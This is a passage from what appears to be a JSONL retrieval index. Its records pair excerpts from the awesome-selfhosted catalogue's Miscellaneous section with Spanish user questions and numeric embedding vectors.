Digitranscode β€” Convert audio files and videos directly in the browser (documentation in French) [AGPL-3.0, Nodejs]. Digiview β€” View YouTube videos in a distraction-free interface (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digiwords β€” A simple online application for creating word clouds (documentation in French) [AGPL-3.0, Nodejs/PHP]. DOCAT β€” Host your docs. Simple. Versioned. Fancy [MIT, Python/Docker]. Domain Locker β€” Domain name portfolio management and tracker [MIT, Deno/Docker]. DOMJudge β€” System for running a programming contest, like the ICPC regional and world championship programming contests [GPL-2.0/BSD-3-Clause/MIT, PHP].", "indexar": "que programa puedo usar para crear rutas educativas online?", "v": [0.13249, -0.02049, -0.21003, -0.1583, 0.09736, -0.03281, 0.07779, -0.03041, -0.09988, -0.16376, -0.11735, -0.07224, 0.02908, -0.07576, -0.0329, -0.04275, 0.0788, -0.01037, 0.08564, -0.01529, -0.02629, -0.07816, -0.05154, 0.04489, -0.04609, 0.05609, 0.01651, -0.05195, 0.09146, 0.08266, 0.02447, 0.21177, 0.04008, -0.10484, -0.03821, -0.00973, 0.06947, 0.02578, -0.06055, 0.01904, 0.04875, 0.13857, -0.11336, 0.01794, 0.05719, 0.05361, 0.11527, -0.04409, -0.11584, -0.02649, 0.08396, -0.01181, -0.05543, -0.07777, 0.16, -0.06562, 0.01987, -0.14202, -0.09201, 0.04248, 0.02188, -0.02108, 0.0748, 0.02038, 0.0495, -0.05537, 0.1456, -0.01836, -0.17838, 0.09434, 0.0374, -0.03094, 0.08795, -0.01859, 0.01185, 0.10739, -0.06495, -0.03035, 0.10142, -0.03813, 0.01267, 0.05799, 7e-05, 0.05783, -0.04671, 0.00273, 0.02852, -0.01915, 0.04345, -0.06848, -0.04792, 0.14391, -0.0067, -0.00907, 0.01865, -0.07222, 0.08835, -0.02631, 0.02847, 0.03833, -0.06474, -0.04477, -0.07733, 0.08941, -0.09995, 0.0398, 0.03679, -0.02579, -0.0425, 0.05466, 0.07358, -0.012, -0.03656, -0.05748, 0.00933, 0.08826, -0.03419, -0.04852, 0.00273, -0.08585, -0.01409, 0.10369, -0.02496, 0.02681, 0.09593, 0.09744, -0.03841, 0.04628, -0.0519, 0.09411, -0.06218, -0.03436, -0.00623, -0.10602, -0.03725, -0.05551, -0.00752, -0.02799, -0.00688, -0.04251, 0.05544, 0.06231, -0.03149, -0.01698, -0.03192, -0.01539, -0.02953, -0.11623, -0.0285, -0.00297, 0.01167, 0.00936, -0.00351, 0.05162, -0.02302, 0.02385, -0.02743, -0.05694, -0.04593, 0.07197, 0.00273, 0.07259, -0.00282, -0.04404, 0.07085, -0.10952, -0.04789, 0.01562, 0.04014, 0.01085, -0.01767, 0.09086, 0.0829, -0.04123, 0.00793, -0.00277, -0.07156, -0.04099, 0.01103, -0.04066, -0.10074, -0.04647, -0.01223, -0.0217, -0.03962, -0.05747, -0.01027, 0.01178, -0.02687, 0.04987, -0.06098, 0.01645, -0.03089, 0.00846, 0.02101, -0.01173, 0.05414, -0.01264, 0.03775, -0.08228, -0.05108, 0.02992, -0.04021, -0.08758, 0.02145, 0.03862, -0.00566, 0.01571, 0.01703, 0.11426, 0.0321, -0.07955, 0.04635, -0.08909, -0.00697, 0.00045, -0.00027, -0.03833, 0.04864, 0.01474, 0.00209, 0.02937, -0.01412, 0.05435, 0.09833, 0.01271, 0.00825, 0.01878, -0.00906, 0.03395, 0.02319, -0.0982, -0.04039, -0.07374, -0.01723, -0.01563, 0.02765, -0.00089, -0.05361, 3e-05, -0.03359, 0.08239, -0.0286, -0.01166, -0.05389, -0.04414, -0.08221, 0.03513, -0.00408, -0.08697, -0.05179, 0.02786, 0.07136, 0.00539, 0.0216, 0.00897]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Digiquiz β€” An online application to publish content created with H5P (documentation in French) [AGPL-3.0, Nodejs]. Digiread β€” Clean up online pages and articles using Mozilla's Readability (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digisteps β€” A simple application for creating online educational paths (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitranscode β€” Convert audio files and videos directly in the browser (documentation in French) [AGPL-3.0, Nodejs]. Digiview β€” View YouTube videos in a distraction-free interface (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digiwords β€” A simple online application for creating word clouds (documentation in French) [AGPL-3.0, Nodejs/PHP]. DOCAT β€” Host your docs. Simple. Versioned. Fancy [MIT, Python/Docker]. Domain Locker β€” Domain name portfolio management and tracker [MIT, Deno/Docker]. DOMJudge β€” System for running a programming contest, like the ICPC regional and world championship programming contests [GPL-2.0/BSD-3-Clause/MIT, PHP].", "indexar": "con que puedo convertir archivos de audio y video directamente en el navegador?", "v": [0.03665, 0.01231, -0.08478, -0.14241, -0.09547, -0.04839, 0.05114, 0.01872, 0.06926, -0.21713, -0.04396, -0.17906, -0.05737, -0.00531, -0.01378, 0.04522, 0.16122, -0.0196, 0.08214, 0.00785, 0.10047, -0.02956, -0.03145, -0.05291, 0.08142, 0.02427, -0.03417, 0.12414, -0.08354, -0.08928, -0.09477, -0.01831, 0.07431, -0.00422, -0.08024, 0.01969, 0.08525, 0.15059, -0.04882, 0.08581, -0.01546, 0.03183, -0.04648, 0.08417, -0.05514, -0.04226, 0.0632, -0.05814, -0.05177, -0.08975, 0.0292, 0.01113, -0.14453, 0.08055, -0.08586, -0.04838, 0.03337, -0.18846, 0.07585, -0.07409, 0.03352, 0.02439, 0.00013, 0.00778, -0.04072, 0.11762, -0.00542, 0.04516, -0.04538, 0.04955, -0.05283, 0.01981, 0.0587, 0.09193, -0.02252, 0.06948, -0.04804, -0.03746, -0.00629, 0.01757, 0.08912, -0.07187, 0.02169, -0.05278, -0.04899, 0.02135, -0.02661, 0.02189, 0.06341, -0.11014, 0.02938, 0.08263, 0.05424, -0.0874, -0.00271, -0.11276, 0.07917, -0.04537, -0.02706, -0.14747, -0.05525, 0.04147, -0.03126, 0.1515, 0.13959, 0.05998, 0.06252, -0.0773, -0.01156, 0.01085, 0.06869, 0.0694, -0.01705, -0.01829, -0.03447, 0.05094, -0.02805, -0.0751, -0.02247, -0.02071, -0.07782, 0.01252, -0.14268, -0.04185, -0.06203, 0.03132, -0.00365, 0.00199, -0.06694, 0.05531, 0.08226, -0.06095, -0.02724, -0.06477, 0.00271, -0.05239, 0.04849, 0.05851, -0.00745, -0.01722, 0.1091, 0.00972, 0.01222, 0.01808, 0.09983, -0.08161, -0.01095, -0.04106, -0.06917, -0.142, -0.0104, -0.0499, -0.05346, -0.11102, -0.01411, 0.07711, 0.00643, -0.08749, -0.01388, 0.04497, -0.00156, 0.05859, -0.02519, -0.02351, -0.04095, -0.06826, -0.08472, 0.03861, 0.02818, -0.05732, 0.00646, -0.0187, 0.03613, -0.08755, -0.06014, 0.05334, -0.01912, -0.01012, 0.0807, -0.05588, -0.00414, 0.00142, -0.02408, 0.01957, -0.02475, -0.04887, 0.06169, -0.01863, -0.14789, 0.04995, -0.04769, 0.03261, -0.04989, 0.02291, 0.06586, -0.04277, -0.09253, -0.00115, -0.12473, 0.01954, -0.01021, -0.05618, -0.00454, 0.00312, 0.00213, 0.00866, 0.01544, -0.02112, 0.07241, -0.01491, -0.01738, -0.01209, 0.04052, -0.00608, 0.04759, 0.01237, 0.04143, 0.07576, -0.03268, 0.02399, 0.04373, 0.01064, 0.07647, -0.05959, 0.02633, 0.04963, 0.03549, -0.0032, -0.10768, -0.02603, -0.04956, 0.01419, -0.0456, -0.0208, 0.00787, 0.05499, -0.04352, 0.03604, -0.08097, 0.0131, 0.02962, 0.05552, 0.0033, 0.01454, -0.0441, -0.03012, -0.0395, 0.01916, 0.07226, -0.06143, -0.00025, 0.06851, 0.01899, 0.02657, -0.02415, 0.01256]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Digiquiz β€” An online application to publish content created with H5P (documentation in French) [AGPL-3.0, Nodejs]. Digiread β€” Clean up online pages and articles using Mozilla's Readability (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digisteps β€” A simple application for creating online educational paths (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitranscode β€” Convert audio files and videos directly in the browser (documentation in French) [AGPL-3.0, Nodejs]. Digiview β€” View YouTube videos in a distraction-free interface (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digiwords β€” A simple online application for creating word clouds (documentation in French) [AGPL-3.0, Nodejs/PHP]. DOCAT β€” Host your docs. Simple. Versioned. Fancy [MIT, Python/Docker]. Domain Locker β€” Domain name portfolio management and tracker [MIT, Deno/Docker]. DOMJudge β€” System for running a programming contest, like the ICPC regional and world championship programming contests [GPL-2.0/BSD-3-Clause/MIT, PHP].", "indexar": "cual es una alternativa libre para gestionar un portafolio de dominios?", "v": [0.10062, 0.03012, -0.02875, -0.06719, -0.03504, 0.02289, 0.09157, -0.08428, -0.2004, -0.03864, 0.00516, -0.2149, -0.03352, -0.09386, 0.00458, -0.06501, 0.23426, -0.08753, -0.03424, -0.01267, -0.10319, -0.009, -0.04174, -0.05106, 0.06435, -0.14192, 0.01866, -0.12226, -0.02546, 0.13132, 0.04085, -0.06955, 0.07362, -0.05969, 0.01042, -0.04476, 0.09322, 0.11562, 0.13488, -0.00951, 0.02485, -0.03205, -0.10288, 0.07443, -0.01835, -0.07669, -0.07045, -0.08143, 0.03962, -0.04608, -0.08032, -0.05825, -0.05468, 0.00095, 0.15887, -0.012, 0.15334, -0.12012, -0.03261, -0.06611, -0.09703, 0.06611, 0.01587, -0.00104, -0.04632, -0.08223, -0.02515, 0.0626, -0.09844, 0.10977, 0.08117, 0.00081, 0.05879, 0.01551, -0.04231, -0.00764, 0.078, -0.02307, -0.01677, 0.04664, 0.09611, -0.07092, -0.04956, 0.04264, -0.07217, -0.17097, -0.06895, -0.08396, 0.00865, 0.03473, 0.05215, -0.07403, -0.08225, -0.06383, -0.06903, -0.01857, 0.02915, 0.04893, -0.05573, -0.00438, 0.05883, 0.16909, -0.16404, 0.06198, 0.09568, 0.09163, -0.07169, -0.06006, -0.07747, 0.0418, -0.08167, 0.01877, 0.02109, 0.03296, -0.03108, 0.06713, -0.03576, 0.04865, 0.03736, 0.02536, -0.07038, -0.09937, 0.03817, -0.04552, 0.0935, 0.02579, 0.0325, 0.0062, -0.05806, -0.01945, 0.01581, -0.00492, -0.0516, -0.06565, -0.11219, -0.00374, 0.07699, -0.00509, 0.00968, -0.04281, -0.10188, 0.05165, 0.00217, 0.00847, 0.09711, -0.06525, 0.00045, -0.05851, 0.0535, -0.02916, -0.06878, -0.04929, -0.01822, 0.11328, 0.01323, 0.04989, -0.07018, -0.02529, -0.11788, 0.03918, 0.00683, -0.02744, -0.04131, 0.08513, -0.01822, -0.0126, 0.0421, 0.01613, -0.05776, 0.03017, -0.00557, 0.07416, -0.00686, -0.00902, 0.04672, -0.06091, -0.04618, -0.07807, 0.0345, -0.01265, 0.02575, -0.05413, -0.03367, 0.07635, -0.01705, -0.00593, -0.01627, 0.03986, -0.042, 0.04116, 0.02244, 0.05536, -0.07702, -0.04058, 0.00032, -0.01507, 0.02997, -0.06277, -0.06136, 0.0054, -0.02456, -0.01031, -0.01409, -0.01878, -0.02657, 0.00946, -0.02402, 0.07201, 0.04134, 0.00273, -0.00496, 0.04763, 0.04896, -0.00011, -0.06067, 0.01467, -0.0471, 0.02876, -0.01593, -0.05934, 0.00438, -0.00549, -0.00787, -0.01339, -0.01103, 0.04842, -0.00333, 0.05563, -0.00587, 0.01255, -0.00049, 0.01651, 0.00363, 0.04805, 0.02481, 0.00216, 0.03339, -0.00539, 0.01742, 0.01089, 0.01325, 0.03784, 0.01312, 0.01907, -0.04324, -0.03841, -0.09411, 0.00731, -0.01864, -0.02622, -0.01962, 0.03267, 0.00367, 0.0224, 0.00047, 0.01495]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ESMira β€” Run longitudinal studies (ESM, AA, EMA) with data collection and communication with participants being completely anonymous [AGPL-3.0, PHP]. F-Droid β€” Server tools for maintaining an F-Droid repository system [AGPL-3.0, Python/Docker/deb]. Flyimg β€” Resize and crop images on the fly. Get optimised images with MozJPEG, WebP or PNG using ImageMagick, with an efficient caching system [MIT, Docker]. Geeftlist β€” Collaborative platform for managing, sharing and reserving gifts between friends and family [GPL-3.0, Docker]. google-webfonts-helper β€” Hassle-Free Way to Self-Host Google Fonts. Get eot, ttf, svg, woff and woff2 files + CSS snippets [⚠, MIT, Nodejs]. Habitica β€” Habit tracker app which treats your goals like a Role Playing Game [GPL-3.0/CC-BY-SA-3.0, Nodejs/Docker]. HortusFox β€” Collaborative plant management and tracking system for plant enthusiasts [MIT, PHP/Docker].", "indexar": "quΓ© programa existe para realizar estudios longitudinales y recolectar datos de manera anΓ³nima", "v": [0.02753, 0.05221, -0.12413, -0.03983, 0.19213, -0.02681, 0.07932, -0.01236, -0.21756, -0.0916, -0.13414, -0.12524, 0.07385, -0.10668, 0.09994, -0.02519, 0.04882, -0.06769, -0.027, -0.0825, -0.17022, -0.11065, -0.01857, 0.04117, -0.08947, -0.01248, 0.05706, -0.09552, 0.12461, 0.09485, 0.00135, 0.05349, -0.02018, -0.04029, -0.05882, 0.08912, 0.03677, 0.05819, -0.08615, -0.07637, 0.01921, -0.02345, -0.09562, 0.03339, 0.09085, 0.02068, -0.13814, 0.01705, -0.03891, -0.03001, -0.04969, 0.1606, -0.05021, 0.0001, 0.05566, -0.02454, -0.01966, -0.15034, 0.04656, 0.07056, 0.03996, 0.0714, 0.01415, 0.00792, 0.091, -0.07463, 0.1012, -0.01165, -0.04911, 0.10288, 0.05338, 0.06826, 0.06091, -0.03544, 0.02978, 0.03322, -0.06672, -0.01264, 0.05819, -0.00472, -0.05062, -0.03113, -0.05608, 0.08344, -0.02519, 0.03302, 0.06464, -0.06381, 0.01105, -0.08069, 0.05565, 0.05564, -0.04659, 0.08423, 0.08583, -0.03143, 0.02951, -0.05882, 0.00629, 0.02415, 0.03523, 0.05267, -0.05689, 0.13257, -0.00039, 0.1368, -0.00817, -0.00849, -0.06916, 0.00944, -0.05538, -0.0175, -0.1088, -0.00832, -0.04848, -0.06747, -0.07283, 0.01987, 0.0515, -0.10028, -0.02835, 0.02077, 0.00823, 0.04135, -0.00718, -0.09023, -0.06033, 0.05887, 0.06735, 0.08076, 0.02739, 0.04986, -0.0625, -0.08489, -0.00284, -0.00259, -0.00486, -0.11858, -0.00374, -0.10088, 0.0324, 0.05799, -0.06742, 0.00326, 0.05946, -0.0709, -0.02932, 0.0145, -0.01506, -0.07863, -0.01278, 0.03008, 0.00978, 0.10835, -0.02197, 0.02772, -0.00096, -0.07962, -0.04786, 0.00815, -0.0229, 0.01031, -0.00603, -0.04932, 0.07978, -0.06491, 0.03928, -0.01975, 0.09385, 0.06046, -0.03396, 0.03065, 0.03017, -0.16117, 0.05834, 0.00736, -0.03754, -0.15436, 0.02176, -0.08479, -0.07193, -0.01655, 0.03148, -0.06585, 0.00753, 0.00235, 0.0047, -0.01505, 0.01656, -0.02788, 0.04919, 0.01036, -0.0372, -0.00246, 0.02232, -0.01527, 0.01904, 0.01708, 0.11399, 0.02945, -0.10131, 0.00237, 0.00582, 0.0269, 0.01845, 0.09868, -0.01304, -0.04446, 0.05951, 0.01582, 0.00711, -0.03528, 0.03221, -0.03044, 0.0098, -0.04702, 0.04371, 0.02847, 0.00354, 0.05776, -0.07145, 0.00099, 0.07944, 0.07971, -0.01561, 0.01518, 0.12002, 0.05273, 0.02545, -0.01448, -0.0407, -0.01398, 0.01685, -0.04763, 0.0548, 0.03143, -0.00501, -0.04696, 0.02584, -0.06141, 0.04549, 0.02193, -0.02284, -0.01318, -0.00968, -0.03739, -0.11301, 0.05185, -0.03172, -0.0416, -0.0293, -0.00085, 0.02013, -0.04028, 0.06291, 0.00125]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ESMira β€” Run longitudinal studies (ESM, AA, EMA) with data collection and communication with participants being completely anonymous [AGPL-3.0, PHP]. F-Droid β€” Server tools for maintaining an F-Droid repository system [AGPL-3.0, Python/Docker/deb]. Flyimg β€” Resize and crop images on the fly. Get optimised images with MozJPEG, WebP or PNG using ImageMagick, with an efficient caching system [MIT, Docker]. Geeftlist β€” Collaborative platform for managing, sharing and reserving gifts between friends and family [GPL-3.0, Docker]. google-webfonts-helper β€” Hassle-Free Way to Self-Host Google Fonts. Get eot, ttf, svg, woff and woff2 files + CSS snippets [⚠, MIT, Nodejs]. Habitica β€” Habit tracker app which treats your goals like a Role Playing Game [GPL-3.0/CC-BY-SA-3.0, Nodejs/Docker]. HortusFox β€” Collaborative plant management and tracking system for plant enthusiasts [MIT, PHP/Docker].", "indexar": "con quΓ© puedo crear un sistema colaborativo para gestionar regalos entre amigos", "v": [0.14678, 0.18458, -0.11912, -0.13947, -0.00621, -0.07576, 0.01895, 0.11237, -0.07859, -0.23958, -0.06436, -0.12727, 0.01185, -0.06473, 0.05683, 0.04622, 0.15156, -0.02563, -0.03897, 0.04182, 0.05582, 0.01369, -0.04441, -0.11088, 0.07844, -0.11321, 0.0458, -0.06355, -0.0349, 0.19145, 0.02308, -0.03952, 0.01999, -0.06558, -0.0477, -0.01446, 0.08069, 0.06513, 0.0505, -0.0265, -0.03524, 0.00888, -0.0366, -0.00057, 0.06628, 0.02813, 0.00047, -0.08432, -0.02611, 0.04768, -0.07781, -0.11106, -0.1379, -0.11217, 0.04277, -0.04339, 0.08995, -0.19082, -0.00394, -0.07102, -0.11604, 0.04149, -0.01216, -0.02056, 0.03513, 0.00084, -0.01343, -0.07515, -0.09471, 0.16525, 0.04454, -0.04353, -0.01756, -0.05674, 0.0569, 0.10499, 0.01399, 0.05583, -0.00831, -0.03961, 0.09272, 0.03882, 0.05798, 0.00144, 0.07048, -0.04396, 0.05513, 0.00102, 0.01961, -0.02196, -0.03811, -0.0169, 0.01673, -0.03897, 0.01813, 0.03918, 0.02777, -0.04082, -0.11131, 0.10053, -0.01628, -0.06954, -0.13629, 0.04829, -0.07226, 0.01409, -0.00414, 0.02982, 0.0595, -0.02272, 0.01609, -0.00074, 0.06055, -0.06151, 0.01538, 0.04418, 0.03602, 0.0163, 0.04687, 0.03989, -0.08345, 0.014, -0.04172, -0.03389, 0.07178, 0.0405, 0.03908, 0.09115, 0.02543, 0.04956, -0.08912, 0.02375, -0.06104, -0.00618, 0.03795, 0.01072, -0.02881, 0.06396, -0.10317, -0.08897, 0.01942, 0.06848, 0.0377, -0.06503, 0.03746, -0.02767, 0.06227, -0.02889, 0.04971, 0.05302, 0.03902, -0.02782, -0.04003, -0.09422, -0.08335, -0.01669, 0.01274, -0.03768, -0.01921, -0.00713, 0.03388, 0.07286, 0.03217, 0.0909, -0.03415, -0.06015, -0.03671, -0.00269, 0.00659, 0.02767, -0.05126, 0.00526, 0.05295, 0.00933, 0.05717, -0.05455, -0.04625, -0.14494, -5e-05, -0.02727, -0.04559, 0.03032, -0.00569, 0.00579, 0.0048, -0.02702, -0.00587, 0.08584, 0.00286, 0.03334, 0.01666, 0.03876, 0.04246, -0.00609, 0.05958, -0.07083, 0.02416, -0.08085, 0.01177, 0.03164, -0.00112, 0.02983, 0.08143, -0.06507, -0.01815, -0.00426, -0.05982, 0.1081, 0.11944, 0.0776, 0.0533, -0.0324, 0.04991, -0.03349, -0.03311, 0.01257, -0.04195, -0.00196, 0.009, -0.03426, 0.0198, -0.02387, 0.02343, -0.032, 0.03445, 0.04833, 0.00321, 0.09075, 0.00269, -0.01728, -0.01769, -0.10289, 0.00993, -0.0315, 0.05541, -0.07647, 0.0342, -0.00441, -0.01358, 0.01833, 0.07296, 0.05745, -0.00363, -0.04179, -0.06893, -0.09209, -0.07078, 0.01345, -0.06715, -0.1112, -0.03273, 0.01393, 0.00922, -0.08533, 0.00255, -0.01984]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ESMira β€” Run longitudinal studies (ESM, AA, EMA) with data collection and communication with participants being completely anonymous [AGPL-3.0, PHP]. F-Droid β€” Server tools for maintaining an F-Droid repository system [AGPL-3.0, Python/Docker/deb]. Flyimg β€” Resize and crop images on the fly. Get optimised images with MozJPEG, WebP or PNG using ImageMagick, with an efficient caching system [MIT, Docker]. Geeftlist β€” Collaborative platform for managing, sharing and reserving gifts between friends and family [GPL-3.0, Docker]. google-webfonts-helper β€” Hassle-Free Way to Self-Host Google Fonts. Get eot, ttf, svg, woff and woff2 files + CSS snippets [⚠, MIT, Nodejs]. Habitica β€” Habit tracker app which treats your goals like a Role Playing Game [GPL-3.0/CC-BY-SA-3.0, Nodejs/Docker]. HortusFox β€” Collaborative plant management and tracking system for plant enthusiasts [MIT, PHP/Docker].", "indexar": "cual es una alternativa libre a las fuentes de Google para autoalojarlas en mi servidor", "v": [-0.05418, 0.01077, -0.00678, -0.05626, -0.13849, -0.0841, 0.02689, -0.11683, -0.10464, 0.01768, -0.10628, -0.19154, -0.03274, 0.04787, 0.14517, -0.01599, 0.13351, -0.14632, 0.07039, 0.03716, -0.03342, 0.05055, -0.0233, -0.18262, -0.15183, 0.00156, 0.03073, -0.06819, -0.09122, 0.04381, -0.01144, -0.05371, -0.00332, -0.00873, -0.07759, -0.01814, 0.10758, 0.18963, -0.01509, -0.08378, 0.00046, -0.06349, -0.09582, 0.09981, -0.0815, -0.05546, 0.04972, -0.07633, 0.02102, -0.0078, -0.03176, -0.05509, -0.17861, 0.02028, 0.0528, 0.12918, 0.15293, -0.16399, -0.04106, -0.00771, -0.20494, -0.01884, -0.0329, 0.01385, 0.08314, 0.02631, 0.04172, 0.03223, -0.13245, -0.03197, -0.00686, -0.01826, 0.07533, -0.08003, 0.03292, 0.05109, -0.05701, 0.01591, -0.01018, 0.15638, 0.05756, -0.04791, -0.04192, 0.14339, -0.05794, -0.0784, 0.02303, -0.04583, 0.03385, 0.08026, -0.04263, 0.12525, -0.03623, 0.15555, -0.07037, -0.03121, 0.13948, -0.04789, -0.02763, 0.01178, 0.11571, 0.0152, -0.07045, 0.02247, 0.02227, -0.02423, 0.0241, -0.05141, -0.03153, -0.00091, 0.04476, 0.01494, 0.01215, 0.03583, 0.05368, -0.02026, 0.08636, 0.11604, -0.0512, 0.01712, -0.04025, -0.01917, -0.02451, -0.01486, -0.03841, 0.06204, 0.03935, 0.01441, 0.00931, -0.05196, 0.03223, -0.01322, -0.05354, -0.06926, 0.01952, 0.04828, 0.0612, -0.03417, -0.01429, 0.0047, 0.01451, -0.00766, 0.02613, -0.03874, 0.09431, -0.0492, 0.00879, -0.01197, -0.08023, -0.08893, -0.07183, -0.05882, -0.00775, 0.0166, -0.09436, 0.03644, -0.03722, -0.01584, -0.03158, 0.0099, 0.0737, -0.03875, 0.02396, 0.06858, -0.01454, 0.01051, -0.00328, -0.00522, -0.04631, 0.0032, -0.04928, 0.04792, 0.01931, -0.07594, 0.05756, -0.01312, -0.02388, -0.09627, -0.01427, 0.06897, -0.03134, 0.0142, -0.09827, 0.00464, -0.03879, -0.05968, -0.00294, -0.03007, -0.00793, -0.02551, -0.06155, 0.02642, -0.03548, 0.036, 0.114, -0.0182, -0.01683, -0.08072, -0.02903, -0.00682, -0.08296, -0.0441, -0.04356, -0.03268, -0.01898, -0.0366, 0.02562, 0.0122, -0.00124, 0.02286, -0.0017, 0.01959, 0.0903, 0.00534, -0.03764, -0.02064, 0.02659, -0.02812, 0.04058, -0.08501, 0.03675, -0.00346, -0.00474, -0.01517, -0.02929, 0.03663, 0.04118, -0.03698, -0.02356, -0.03115, 0.00833, -0.00906, -0.06398, -0.00271, 0.03545, -0.02755, -0.00105, 0.00508, 0.04536, -0.02543, 0.05871, 0.04663, -0.00863, -0.03618, 0.01021, -0.04146, -0.03862, -0.04814, -0.03285, -0.02248, -0.01863, -0.01356, 0.03543, -0.02373, 0.05853, -0.00374]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ImgCompress β€” Image processing tool that runs entirely in Docker. Compress, convert, resize, batch-process images, and remove backgrounds using local AI without cloud dependencies [GPL-3.0, Docker]. Infisical Community Edition β€” Platform for secrets, certificates, and privileged access management [MIT, Docker/K8S/deb]. iSponsorBlockTV β€” Block and skip sponsors, while also muting and skipping ads on YouTube [⚠, GPL-3.0, Docker/Python]. IT-Tools by sharevb β€” Collection of handy online tools for developers (fork of [it-tools](https://github.com/CorentinTh/it-tools)) [GPL-3.0, Docker]. Jelu β€” Read and to-read list book tracker [MIT, Java/Docker]. jetlog β€” Personal flight tracker and viewer [GPL-2.0, Docker]. Kasm Workspaces β€” Streaming containerized apps and desktops to end-users. Examples include Ubuntu in your browser, or simply single apps such as Chrome, OpenOffice, Gimp, Filezilla etc [GPL-3.0, Docker]. Koillection β€” Koillection is a service allowing users to manage any kind of collections [MIT, Docker/PHP].", "indexar": "con quΓ© herramienta puedo comprimir y convertir imΓ‘genes directamente en mi servidor sin usar la nube?", "v": [-0.07373, 0.05793, -0.23587, -0.15183, -0.02707, -0.09464, -0.08616, -0.10505, -0.0409, -0.19025, -0.12901, -0.10041, -0.00132, -0.07681, -0.05201, 0.00715, 0.10328, -0.11738, 0.05038, 0.04622, 0.0487, 0.00508, -0.08335, -0.10314, -0.12031, 0.00561, 0.07086, 0.02973, -0.15766, -0.05826, -0.08548, -0.01881, 0.10125, -0.00375, -0.06558, -0.08506, -0.02043, 0.10694, -0.06976, 0.03466, 0.04827, 0.04321, -0.08199, 0.13914, -0.01862, -0.02663, -0.01073, -0.08155, 0.00379, 0.03401, -0.06597, -0.07972, -0.14474, 0.02386, -0.11235, -0.13692, 0.14918, -0.13307, 0.07916, -0.04756, -0.09497, 0.08061, -0.0568, -0.06827, 0.02996, 0.00043, -0.04108, -0.02959, -0.19434, 0.0167, 0.00865, 0.08289, 0.03345, -0.05489, 0.04589, 0.04436, -0.00982, -0.05224, -0.00262, 0.05222, 0.02711, 0.04791, -0.06286, 0.04361, -0.09292, -0.07072, 0.03438, -0.02987, 0.08665, -0.02521, -0.03153, 0.03034, 0.04947, 0.0411, 0.069, 1e-05, 0.02014, 0.0045, 0.00142, 0.00514, 0.15907, 0.02328, -0.0703, 0.05902, -0.01393, 0.00647, 0.08207, -0.08494, -0.07078, -0.00842, 0.09802, -0.04424, -0.01816, 0.02074, -0.05938, -0.03869, 0.02493, -0.08856, -0.03152, -0.01134, -0.01823, 0.00169, -0.0033, -0.03788, 0.02192, -0.00717, 0.01625, 0.056, -0.15987, -0.04455, -0.13523, -0.03215, -0.03455, 0.00307, -0.01511, -0.0091, 0.03488, -0.1779, -0.00935, -0.10439, 0.00647, -0.01274, -0.02823, -0.03978, 0.07055, -0.02709, 0.08609, -0.05179, -0.073, -0.01041, 0.03095, -0.06152, -0.04593, 0.02528, -0.05475, 0.04769, -0.0075, -0.02686, -0.11846, -0.01438, -0.00355, 0.01753, 0.04888, 0.05545, 0.02203, -0.08908, -0.02598, 0.0326, 0.00685, 0.10849, -0.00175, 0.01302, -0.01099, -0.06685, 0.05839, 0.03142, -0.02029, -0.03219, -0.00355, -0.03996, -0.00873, 0.00489, -0.01852, 0.0046, -0.02199, -0.00182, 0.00358, 0.02869, -0.06386, 0.05753, -0.04461, 0.03799, -0.01104, -0.01285, 0.1156, -0.0425, -0.05025, -0.01357, 0.00675, -0.03503, -0.05026, -0.01, -0.0743, -0.04216, 0.00478, -0.01853, -0.028, 0.02868, -0.00541, -0.0195, -0.01397, -0.00012, 0.04122, -0.05795, 0.03097, 0.01666, 0.05366, -0.03825, -0.04733, -0.04104, 0.00592, 0.00594, 0.03499, -0.00768, 0.02217, 0.06471, -0.03529, 0.03587, -0.014, -0.02024, -0.02056, 0.0282, -0.04538, -0.04738, -0.02128, -0.02579, 0.02713, -0.0251, -0.05446, -0.07043, 0.00245, 0.07662, -0.01173, -0.00715, -0.07624, -0.03746, -0.03376, -0.03162, -0.01253, -0.05876, 0.01652, 0.02955, 0.08396, -0.05953, -0.001, -0.00379]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: ImgCompress β€” Image processing tool that runs entirely in Docker. Compress, convert, resize, batch-process images, and remove backgrounds using local AI without cloud dependencies [GPL-3.0, Docker]. Infisical Community 